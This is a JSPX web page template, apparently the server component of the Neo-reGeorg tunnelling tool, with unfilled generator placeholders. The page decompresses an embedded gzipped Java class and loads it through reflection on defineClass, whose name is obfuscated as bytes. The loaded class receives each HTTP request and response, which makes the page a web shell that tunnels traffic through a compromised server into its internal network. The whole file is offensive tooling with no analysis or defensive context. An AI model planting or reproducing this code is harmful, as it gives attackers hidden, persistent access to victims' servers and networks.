<jsp:root version="2.0" xmlns:jsp="http://java.sun.com/JSP/Page"><jsp:directive.page contentType="text/html"/><jsp:directive.page pageEncoding="UTF-8"/>
<jsp:declaration><![CDATA[
    public static byte[] unGzip(byte[] bytes) throws Exception{
        java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
        java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
        java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
        byte[] buffer = new byte[256];
        int n;
        while ((n = ungzip.read(buffer)) >= 0)
            out.write(buffer, 0, n);
        return out.toByteArray();
    }

    public static Class loader(byte[] bytes) throws Exception {
        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
        java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
		method.setAccessible(true);
		Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)}); 
		return clazz;
    }
]]></jsp:declaration>

<jsp:scriptlet><![CDATA[
    Object[] args = new Object[]{
        request, //0
        response, //1
        "BASE64 CHARSLIST".toCharArray(), //2
        new byte[]{BASE64 ARRAYLIST},//3
        new Integer(HTTPCODE),//4
        new Integer(READBUF),//5
        new Integer(MAXREADSIZE),//6
        "NeoGeorg says, 'All seems fine'",//7
        new Integer(BLV_L_OFFSET),//8
    };


    if(application.getAttribute("BASE64 CHARSLIST") == null){
        byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,63,-61,-90,99,0,3,-99,57,11,120,84,-27,-79,51,-69,-25,-20,-39,-57,33,-39,-124,28,-62,73,-78,73,0,-123,101,-77,24,5,92,117,-61,-93,16,-126,-92,38,65,-109,64,68,-85,-80,108,78,-62,-62,-78,27,119,55,64,-84,-91,-40,-46,-42,106,-75,90,31,45,-40,-54,-61,-57,-6,-120,104,91,89,18,35,17,-38,-118,86,-5,-82,-75,-44,-66,108,109,-83,-74,-43,-46,123,123,31,-19,-19,109,-18,-52,57,103,55,-69,121,124,-6,93,62,-104,-1,-1,-25,-97,-103,127,-2,-103,-7,103,-26,44,47,-1,-21,-39,81,0,-72,8,-1,-22,-124,98,56,45,-63,55,36,-8,-90,4,-33,-110,-32,1,7,28,-124,23,36,56,-52,-29,25,9,94,116,-126,3,94,-110,-32,-37,46,-80,-62,-53,46,120,5,-66,-29,2,1,-66,43,-63,-9,24,-13,125,59,-4,-128,-57,31,58,-31,71,-16,99,6,-81,74,-16,19,39,40,112,-102,-63,107,78,112,-63,79,121,118,-42,73,-14,126,-58,-62,94,-25,-39,-49,37,-8,-123,19,126,9,-65,98,-16,107,6,111,-40,-31,55,76,-3,91,-34,126,-109,-49,-8,29,11,-2,-67,4,111,57,97,62,-4,-127,-63,-37,18,-68,-29,-124,-123,-16,71,6,127,-110,-32,-49,78,120,23,-34,115,-126,31,-2,98,-121,115,78,-8,43,-4,-101,4,-1,-50,-29,-33,24,-4,7,-17,-4,39,75,-7,47,39,-4,55,-4,-99,-63,63,92,-16,63,-16,79,23,-4,47,-4,-117,-63,24,-19,34,-48,-111,-120,36,19,45,12,-84,-68,20,24,-120,-92,16,-38,-100,40,-95,-99,0,-23,73,-32,13,38,113,-72,-48,-119,46,23,-54,-16,79,59,-50,96,-86,34,59,22,-13,-114,-101,52,-57,18,-98,-107,50,-104,-55,-96,-116,113,-118,-124,-77,-100,112,21,-39,5,-53,113,54,-51,80,101,80,-63,-52,-107,100,23,-84,98,42,15,47,-85,121,86,99,-57,90,70,-49,113,66,4,-25,50,-104,39,-31,121,78,-40,-116,-25,59,113,62,46,96,-116,-41,-123,11,-47,103,-57,58,59,-6,-99,-32,-127,-77,118,92,-60,-88,11,36,-84,39,34,120,-125,23,23,-38,-15,34,39,46,-58,37,-52,-79,-108,103,23,59,49,-128,-105,-40,-15,82,94,92,-58,32,-56,-96,-127,9,-106,73,-72,-36,9,-69,-40,125,-69,112,-123,29,87,-14,-8,33,59,-82,98,-28,89,-42,120,53,-125,70,59,-82,97,85,-101,24,-84,101,112,57,-125,117,-28,37,108,118,-62,45,-8,97,23,94,-127,45,12,90,37,108,99,-52,122,9,-81,-108,-16,42,39,-36,-118,-19,76,-37,33,97,-89,19,-18,-32,-16,-72,3,55,48,-40,-56,54,-17,98,112,53,-125,77,18,94,-29,-124,123,89,-107,123,-15,90,6,31,-111,-16,58,9,-81,-105,112,-77,-124,91,16,44,90,-116,-64,-75,-115,4,-70,53,-98,-83,70,-80,45,-117,-60,34,-87,21,8,86,-17,-62,-115,8,66,99,-100,-73,108,-38,13,-3,-95,104,18,65,-15,-74,108,15,-19,10,-43,71,67,-79,-34,-6,-11,91,-73,107,-31,84,-61,-62,107,16,-60,-83,-127,-91,44,109,-106,-9,-38,-43,11,-13,72,58,82,-119,72,-84,-73,-63,32,96,73,-77,-68,-109,119,23,-14,-63,-114,109,90,-88,91,75,-20,-48,6,16,-26,79,69,52,-107,84,103,-45,-98,-80,-42,-105,-118,-60,99,-92,-101,20,73,70,-29,-31,80,116,-126,-106,89,126,-46,-46,-71,53,-70,107,115,-73,22,-42,-17,-28,35,85,-13,-56,-102,99,41,-83,87,75,-112,50,-109,111,104,114,106,-79,28,-25,100,-102,41,69,-15,-67,18,-95,88,-9,-22,-127,-108,70,26,-38,-68,-51,-51,58,-46,-71,-107,17,-99,113,-94,36,-45,-80,-51,-102,9,25,-119,-91,58,-29,38,-87,-24,53,40,109,-69,-76,68,-92,-121,108,82,63,-59,-99,116,-52,-98,-6,-104,-106,-86,79,38,-93,-11,29,29,45,29,90,50,73,-42,-48,111,91,26,-34,-90,-123,119,52,70,35,26,-55,77,-12,39,83,90,55,66,48,-85,123,82,11,-9,39,34,-87,-127,-6,-80,-106,72,-43,95,125,-15,-123,-105,53,-46,36,-46,19,9,-121,82,90,-61,20,-10,-37,40,97,40,43,-76,67,75,-112,94,57,-95,-91,-67,90,106,85,-104,61,-95,117,55,39,-109,-3,90,-126,110,-80,-64,-69,-16,3,29,37,-61,17,56,-118,48,115,74,-69,-97,111,-36,48,73,-25,69,-23,-106,-37,82,-87,-66,-6,117,4,58,12,68,59,-59,-91,-106,36,27,-50,127,63,-70,100,31,-59,-120,38,-61,87,-32,1,25,14,-63,97,-124,-110,73,14,-109,113,43,-122,17,-36,19,-17,46,99,55,106,18,-10,-56,-40,-117,-37,100,-116,-32,-10,2,34,67,89,25,119,48,51,-56,24,-59,-99,18,-58,100,-116,99,88,-58,62,-56,32,-108,79,-108,-72,-70,63,18,-19,-26,3,111,-64,4,-35,31,-109,50,-90,-80,95,-122,71,-31,49,25,119,-31,110,25,-98,-126,-89,-55,38,-29,124,-71,64,-105,112,-113,-116,3,120,-93,-116,31,-123,-93,50,-34,-60,-74,19,58,-37,55,52,-55,-8,49,-36,43,-61,-109,112,76,-58,-113,-13,-42,62,-20,71,-112,117,17,28,33,27,-38,91,-8,40,98,-68,25,63,-127,80,-111,-37,96,59,-47,102,99,60,22,-93,123,-48,17,50,126,-110,-55,-10,-29,-89,16,106,11,67,-116,105,-109,5,-60,18,126,90,-58,-49,-64,-61,50,-34,-126,-97,-91,-76,65,65,40,-31,-83,50,-34,-122,-97,51,15,25,-25,-42,3,-90,53,20,11,-23,-58,-66,29,-17,-112,-15,-13,120,-89,-116,119,-31,23,100,-68,27,-17,-111,-16,94,25,-17,-61,47,-54,-8,37,60,32,-31,65,25,-17,-57,47,75,-8,21,25,31,-64,67,50,30,-58,35,50,30,-123,39,100,120,-100,0,62,-120,15,-55,-8,48,62,34,-61,87,-31,107,50,60,2,105,25,-45,-8,-88,-124,-113,-79,-127,30,-105,-15,9,28,-108,-16,73,25,-113,-31,83,18,-110,57,-117,72,-21,20,61,-122,69,45,90,-84,55,69,-98,-4,42,28,-93,56,-24,-92,23,-102,-20,-47,18,-117,-102,-8,125,-21,-2,-2,26,-53,-1,58,-53,127,-122,-99,24,-59,-29,50,102,24,-100,-64,33,4,-113,110,-70,72,-68,-98,-33,-22,-86,68,34,52,-80,-66,63,-43,-41,-97,34,-33,106,33,-14,-3,-80,-116,-49,-30,8,43,65,126,125,14,31,-107,-15,36,75,73,-31,-88,-116,-49,-77,-48,83,-28,107,60,-51,-98,-109,26,-41,-73,-75,53,53,118,-54,-8,13,114,30,126,19,-65,37,-29,11,120,38,-33,61,-51,4,58,-30,-31,29,-12,-60,-70,-69,19,-12,-66,-39,-117,47,74,-8,-110,-116,-33,-58,-105,101,124,5,-65,35,-31,119,101,-4,30,126,-97,114,-8,-6,43,40,28,-42,-82,106,110,-95,124,-78,-90,-71,35,39,-2,7,-8,67,-124,26,67,40,105,30,-34,22,34,7,70,-109,-11,-122,-28,70,99,41,-29,-113,-16,70,-30,111,111,90,-75,70,-62,31,-53,-8,42,-2,-124,66,24,95,-109,-15,-89,108,-40,-77,50,-2,12,95,39,-83,-41,-82,111,-17,90,-43,-66,70,-58,-97,-29,47,100,-4,37,-66,46,-29,-81,-40,67,3,-8,26,-91,-8,-55,-47,-34,-45,99,4,-5,-81,73,-61,-27,-53,121,-10,6,2,46,-25,-101,12,49,23,25,21,23,-55,-8,27,-4,-83,-116,111,-30,-17,100,-4,61,91,-24,77,54,-40,91,60,-5,3,-57,-58,-37,50,-66,-61,-121,-4,17,-113,32,-88,57,-5,-76,105,-87,-35,-15,-60,14,126,-61,-119,-98,80,88,-109,-15,79,120,15,66,89,-127,1,77,-45,81,105,40,64,47,-51,-102,20,-1,-52,-49,-17,33,120,24,-95,106,-110,119,-101,99,57,-25,-78,53,-8,85,-29,-69,50,28,-121,-116,12,95,-121,103,100,56,1,67,-39,-116,-48,-97,-118,68,-21,-37,41,-27,-57,-119,-10,61,-4,-117,-116,-25,-112,-114,-99,-5,-2,-119,-112,28,-42,-90,-59,19,-38,-27,4,122,17,-86,39,60,-68,120,50,21,11,-19,-44,54,114,57,-120,104,-119,73,4,44,45,-1,125,81,2,-98,-30,-52,-68,-13,114,25,5,-63,78,-107,103,99,40,-38,-81,-23,101,-97,75,17,37,116,-77,-108,-112,-18,-34,-123,45,-45,-90,87,-93,-36,-28,-76,-103,-114,-126,-98,-103,46,82,-33,-43,-97,-31,30,-54,-38,-75,-109,36,23,82,-112,92,7,-79,117,-111,-2,124,-95,114,-109,-100,-99,115,37,5,-106,-71,65,84,-18,94,-109,39,-106,50,-34,54,61,118,66,-27,57,14,-31,-68,-23,14,-53,-93,106,-56,-26,92,58,-95,-128,-39,65,-56,72,52,-76,53,74,38,18,8,69,69,-49,22,-22,-21,-45,98,52,89,-12,-127,-70,21,51,-27,55,-104,-11,-98,122,43,123,42,110,108,81,-80,122,-89,108,111,-92,93,-20,-108,-11,61,-36,54,53,-25,83,100,59,12,-70,102,86,-35,-84,-111,-60,-35,60,-103,-90,7,-94,83,-59,-98,104,127,-110,-20,35,-122,-93,-15,36,-47,57,-62,-15,-99,125,-95,-124,-42,25,-97,-122,-121,-62,65,-92,55,-94,-91,12,103,-76,106,-87,109,113,-70,117,81,-100,110,63,94,6,40,99,101,-17,96,22,-101,-15,61,118,80,50,87,-84,-77,2,92,-124,90,19,55,50,39,25,-43,123,13,107,87,60,126,126,99,52,-60,15,-42,25,73,54,-57,-110,-87,80,44,76,-54,-50,36,-98,-55,47,97,-98,119,66,35,52,-111,68,-65,-8,-20,66,26,-86,83,-71,56,116,-23,-79,-110,61,-28,-126,105,-3,57,21,55,93,78,-32,-106,25,-95,-53,108,-83,-58,-87,-82,-48,6,-52,-41,-40,48,113,43,-1,-87,54,76,104,-109,58,120,-94,25,73,68,87,-99,-61,-37,72,-44,107,67,-31,84,60,49,-112,-1,40,-13,-69,-65,124,-102,6,-61,92,19,-47,83,-104,107,18,39,-97,-55,-17,103,-99,-34,-110,-73,-111,37,-55,17,106,-42,-65,122,-118,107,-118,-11,-17,-44,18,33,-45,-67,-54,-8,70,99,60,26,53,-36,78,60,66,52,-62,-35,89,-42,-94,-109,56,-13,37,-22,-87,-74,-123,-24,57,-16,19,26,-11,-105,28,-98,51,-13,89,-11,93,93,-71,66,28,103,-80,20,-53,-116,39,-8,-87,-28,75,109,54,-15,36,-76,116,50,-106,78,-38,22,74,-74,-23,65,64,-103,-113,-102,102,33,-90,47,10,31,100,-82,29,117,-28,-116,66,-30,-58,67,-6,-54,4,61,-122,68,106,-128,-101,-34,105,-70,-12,73,-17,-80,-104,68,-27,-73,13,20,-96,121,-23,45,127,-121,-50,-75,19,-79,-7,97,32,120,-11,-17,-126,-78,-87,40,-23,58,-108,91,-24,27,-61,-108,111,-88,-70,54,-94,69,-69,-119,-77,-92,-64,48,-83,-95,62,18,60,-93,0,65,73,-115,-66,-65,58,-8,-87,23,18,19,-86,-112,88,-89,113,27,95,-123,-51,-67,49,42,91,-115,33,118,87,81,-31,-87,100,-79,-28,-72,-59,88,-91,108,39,110,124,87,-26,103,-12,-62,52,-52,-126,-102,18,-119,120,34,-105,-127,57,-106,83,-95,84,-65,110,3,-3,-118,-7,-115,-6,0,125,-119,-24,121,-102,-93,40,28,-17,27,-32,-49,-76,-55,46,108,-98,2,-91,-53,114,-91,-30,-71,122,79,102,-120,-102,85,68,41,-52,-69,-71,-52,-20,8,117,119,103,-81,37,16,-110,-114,118,-23,73,-46,-24,117,-56,99,-108,83,-109,-102,-2,125,39,112,-90,-28,103,-105,-51,-113,-45,-10,95,36,-40,-106,-44,17,28,-8,121,-23,-44,-96,106,-104,-6,-13,-71,121,60,113,-114,-45,82,40,-124,-115,4,76,29,-115,119,-94,36,-77,-19,49,88,75,-120,-80,39,-46,75,41,103,53,125,63,-17,-48,11,-110,-105,-46,-15,84,-38,106,-4,-74,-71,12,-114,107,92,101,36,-109,-87,43,56,125,-128,-112,81,86,-91,72,-45,-83,-3,92,-106,-34,-25,-127,100,127,82,32,-75,-28,-34,2,-58,-9,-5,77,32,-9,70,-117,19,-38,-50,-8,46,45,-113,117,102,-18,34,-20,-30,-100,-121,66,81,-2,-71,-128,9,102,-25,-68,92,72,-44,-64,91,83,110,-24,85,49,100,4,75,-15,56,-127,41,-102,106,-85,22,74,-28,-5,48,-73,73,34,-83,122,-63,83,-57,127,41,-103,116,-88,-48,19,-115,-48,99,-108,41,55,-75,107,59,67,84,94,-40,39,-107,-34,-58,-87,-38,10,-109,-57,-1,1,-69,16,-109,92,76,-10,69,-71,104,77,-27,-113,-126,-97,64,-58,67,62,-39,-65,53,105,-10,43,-77,-8,-121,-116,-87,-120,-24,25,109,-96,-74,40,97,100,3,-87,-41,40,-41,-108,-82,104,54,-79,81,79,22,-44,-115,-68,-78,64,38,-91,-101,-73,82,82,105,-118,106,59,-87,-89,35,74,23,-25,101,115,105,20,-60,-68,-74,-98,69,21,-103,103,-27,58,125,51,21,-110,-93,36,-26,53,-98,-94,87,71,56,24,-95,-25,83,-104,3,7,-95,24,44,112,63,124,-103,-96,-123,127,31,0,-96,-15,16,28,-90,-79,24,-112,127,-99,32,-8,32,-83,74,104,-92,47,124,16,125,39,-128,-66,29,-7,15,-14,55,-125,-79,45,-2,3,108,48,-113,-58,-5,-22,78,-127,-123,-2,-74,-6,-83,-117,79,-127,-75,-51,47,-48,32,4,5,-97,95,-92,-119,72,127,-113,-125,-51,-25,-73,-47,66,-94,-65,-57,-63,-18,-105,104,-18,-56,-128,51,32,-6,-19,-39,-87,-51,-17,-74,101,-25,-110,-33,-51,36,-82,-96,-35,-17,-50,17,56,-124,-128,83,12,-72,108,1,89,10,-52,-80,7,-118,-36,-74,64,-79,91,10,-72,-35,-10,64,-119,-37,17,40,93,52,12,50,-62,48,-52,64,8,-50,84,-123,97,40,-94,73,-103,-37,123,18,-118,-125,-118,49,-52,34,26,55,125,-109,29,-126,-34,-46,-110,96,57,-83,74,-119,102,-74,58,59,3,51,3,-86,-94,90,14,-125,45,13,-105,40,-22,115,-10,96,-123,58,91,-83,-56,64,-103,-127,-101,55,2,-54,-90,19,48,75,45,-49,64,-7,8,-72,54,-87,21,39,-128,-40,104,-87,6,-53,-45,99,-49,-5,120,-89,34,-88,-86,-86,-30,24,-126,-54,33,-88,10,42,-60,22,44,87,-53,-104,-36,-89,-38,105,91,103,-87,86,-53,50,80,-61,-96,-42,58,-88,42,74,-119,126,-45,114,-75,-4,-116,-91,-106,-106,-91,-6,-110,116,42,-99,-109,-127,-71,7,64,-42,37,-49,59,104,-79,50,45,118,48,9,65,-70,-33,121,-44,-117,15,-61,-7,116,3,117,4,-26,111,82,-53,79,-64,2,82,-101,-108,-10,-98,-126,-123,-63,74,-75,82,85,51,-32,83,43,-123,12,-44,-107,-6,-43,-54,12,44,58,0,-11,106,-27,41,-16,-5,50,112,65,105,-3,16,92,24,-84,82,-85,80,56,9,23,109,-78,-6,58,48,3,-117,-11,109,-75,42,3,75,50,-80,-108,-28,95,76,-14,-119,102,8,2,65,-113,-22,25,-126,75,84,-49,48,92,74,-56,106,-75,122,24,46,67,56,0,94,-98,5,17,88,-15,-102,69,106,-51,48,52,88,32,88,75,-25,-41,12,-63,50,-75,54,3,-53,-45,99,-81,-26,108,-65,-100,53,89,17,-84,78,-125,20,-84,-79,14,-6,-24,70,-122,-55,86,102,-32,67,-63,26,-75,38,3,-85,-120,-69,90,-83,-75,-86,-75,-93,25,88,-83,86,103,-96,-111,-63,26,-26,108,26,-122,-75,-20,-25,-53,11,116,88,-103,-81,-125,90,115,6,-22,-44,-102,-46,117,25,104,62,8,115,104,-10,97,125,86,-50,42,101,-32,10,-110,46,-88,53,106,-19,48,-76,88,33,61,118,-110,-59,-74,-106,-32,-99,71,97,6,79,-37,88,-73,10,-98,-83,-25,19,94,-124,34,85,80,-60,97,-72,-46,2,-42,-63,18,1,40,58,106,71,-32,42,-118,-121,-10,-32,28,-42,-109,-62,100,83,-96,-122,-82,86,-83,-44,-48,-26,92,-42,124,-82,85,-95,-37,119,-88,115,-44,-71,25,-24,76,-113,-67,-82,71,13,-7,116,3,69,1,-111,8,-91,-21,120,103,-29,16,116,13,-61,-43,86,32,-115,88,11,-3,20,-75,-116,-73,54,77,-116,21,-14,57,-75,108,57,93,-56,110,-82,108,-80,-100,-63,115,-76,-108,-11,-91,74,-79,115,45,-59,-50,65,-24,37,92,-79,-114,-85,-96,-103,-101,103,67,-16,-111,0,-103,-6,58,-10,105,6,-82,31,-127,-51,20,-54,74,-27,9,-40,82,-30,26,-54,64,72,-83,-78,102,96,107,-105,58,-109,34,-71,106,24,-62,-92,-40,44,101,70,105,119,71,26,99,36,-123,-25,90,7,13,69,28,103,61,-124,-67,-102,78,-21,-43,79,-13,49,-45,48,108,-77,-112,19,34,70,32,94,-97,-127,-19,105,16,41,22,-11,-83,29,22,72,-29,2,98,-120,-22,12,-113,79,100,56,3,-69,21,-37,16,-20,36,122,-35,-4,-79,64,-107,34,5,60,-42,64,117,-42,-36,53,74,-43,3,-48,-82,84,-79,11,-104,34,78,33,98,85,-86,-40,-48,53,-20,-121,78,70,-10,117,41,-43,74,-43,-106,0,1,-59,118,4,-100,-76,-14,28,1,55,105,-19,100,-9,111,-24,72,67,113,-18,-128,-12,-40,83,-39,27,-62,44,58,56,-17,-122,-107,-6,13,97,23,41,124,-125,-82,112,116,-126,-62,-118,-30,52,-77,26,-65,-74,81,-42,-100,-52,-54,124,-119,46,54,111,82,-121,-87,3,20,64,21,60,-21,-17,74,-113,-99,-53,-99,86,61,-59,105,89,-93,-87,101,62,66,-114,63,-117,-126,80,72,-13,56,125,86,73,-125,-48,106,29,4,23,60,-127,42,86,-127,-57,114,-111,-27,82,75,3,120,-84,-9,91,-33,-78,-66,3,30,-95,92,-88,17,-26,-46,-72,78,120,73,120,-123,-58,-65,-117,1,-15,50,-16,80,122,111,16,-17,6,15,46,-77,-84,-32,-47,-78,-46,-14,-82,62,-66,103,-19,-27,-47,-70,77,-68,-109,71,-67,14,60,2,105,-93,14,-32,44,16,-63,78,-93,115,4,118,-111,-113,118,-73,-42,-115,-82,-80,6,4,69,-16,28,-123,-65,-43,41,-62,126,1,-105,-108,-64,-40,-34,-128,72,-88,-61,80,-25,-9,61,3,54,69,20,111,90,-102,-127,61,93,-26,-54,-74,87,-38,99,-84,75,7,50,112,99,87,26,-122,-13,89,109,58,107,-45,-76,-84,-118,-83,4,-50,-19,-107,110,-38,-105,-73,97,115,23,-17,21,-77,66,63,106,8,-19,-50,23,42,-3,63,-60,41,82,9,-100,-38,-21,-74,21,108,73,-18,-107,123,-11,101,122,76,-10,103,-32,-90,-89,-51,90,-7,40,60,102,-38,-88,20,4,112,-46,104,-85,-93,-36,-42,-22,31,93,-63,-15,-20,57,1,31,11,10,86,-78,-117,72,-90,122,-101,68,-39,-3,-118,-72,95,-60,37,75,-24,-62,-116,115,40,54,-53,-95,-79,119,8,-22,69,-24,-123,2,18,-55,36,-111,116,18,-55,32,57,74,-39,-63,-58,106,-70,47,100,-3,51,-80,-41,-92,15,-40,21,-69,123,-7,97,112,-88,84,13,54,60,-51,-110,20,59,99,13,33,118,18,114,-106,-96,46,-28,58,18,34,-47,117,-55,16,118,-9,-78,-67,98,-127,28,-121,-30,-104,40,-57,-63,88,67,-114,67,-105,-29,48,-28,40,36,-57,110,35,107,-19,81,28,44,34,61,54,-37,-32,-46,-19,99,-25,-97,-75,-87,-11,-32,86,35,73,-10,-79,-47,72,101,-71,-59,87,-6,-15,12,-20,99,35,101,-93,104,-99,95,17,22,7,69,-77,4,-109,9,-53,85,-47,74,-126,110,-50,-64,39,-12,5,-51,63,105,-44,-30,-106,60,34,-106,-93,-29,-56,-29,-23,-79,-95,58,43,33,55,10,-35,-60,103,40,48,72,-1,4,114,16,7,-12,-109,112,-52,84,101,7,88,65,-94,113,51,-41,-44,58,42,-87,25,-40,-33,58,4,-97,106,-93,-6,-11,105,-82,52,-105,-45,-28,51,92,104,110,9,10,124,-99,-49,6,69,85,52,-9,-68,60,-45,55,111,13,-38,84,-37,105,-72,-19,0,-108,-88,-74,12,124,-114,-30,-30,-10,3,32,10,-125,84,9,-45,99,25,-21,-32,4,21,28,-4,95,32,102,-29,117,59,-67,40,-118,22,-72,89,-17,90,90,-83,43,124,-93,1,65,-94,-108,103,27,-127,59,54,81,55,-10,-7,-96,-28,81,-124,-93,-108,-83,-91,12,-36,25,16,85,73,-75,89,85,27,-43,-54,-69,-70,84,74,-96,95,-96,-101,58,-69,-39,-27,-60,-28,-96,93,-121,85,117,-24,-69,30,-62,109,-39,-78,66,17,-123,-121,-96,66,17,-35,-114,7,97,38,121,86,-81,77,14,74,36,-108,-106,28,-76,86,29,29,-23,-79,67,126,-61,78,14,-2,15,7,83,-75,-37,72,93,-74,-50,110,-97,-43,-18,46,27,-126,-69,59,124,-18,5,-26,-52,-52,-47,-92,-81,-57,55,122,20,-38,125,-98,-59,103,96,45,65,-74,-45,105,112,29,-96,20,44,80,9,-30,-14,46,-90,-87,-44,10,102,-18,20,-3,30,14,48,85,28,101,-67,-73,12,-63,61,-108,-56,105,-55,117,-109,-118,-121,109,-65,-107,-4,119,-52,-81,71,14,66,59,-12,-62,118,-35,105,14,-2,57,-38,84,-20,2,114,-101,72,-29,-36,17,-72,-105,-76,-72,-81,-43,95,89,-47,45,108,-55,-64,23,43,-74,-84,-16,-112,25,4,63,59,-21,75,-86,-112,-67,-44,113,-56,-104,-68,-105,16,-81,-123,-58,58,-97,77,-49,12,62,81,31,-36,-10,61,-5,124,-126,49,117,-45,-44,106,76,103,-17,-39,-73,-84,114,-48,20,114,2,-122,76,33,43,-55,50,44,100,9,57,-86,-91,-50,86,-63,-76,119,117,-42,-119,21,110,-5,-115,-26,92,-88,112,-69,-77,115,107,-123,123,118,118,-98,-51,23,-61,-16,-84,41,-84,-120,70,43,-115,22,97,-48,-36,27,-127,-25,-52,0,-99,65,-1,120,-49,108,-55,-77,33,116,-110,-2,-115,126,16,-94,-25,41,58,39,52,-8,-42,-109,112,-64,80,2,-2,15,-39,50,-116,-82,-21,33,0,0});
        Class clazz = loader(clazzBytes);
        application.setAttribute("BASE64 CHARSLIST",clazz.newInstance());
    }
    application.getAttribute("BASE64 CHARSLIST").equals(args);
]]></jsp:scriptlet></jsp:root>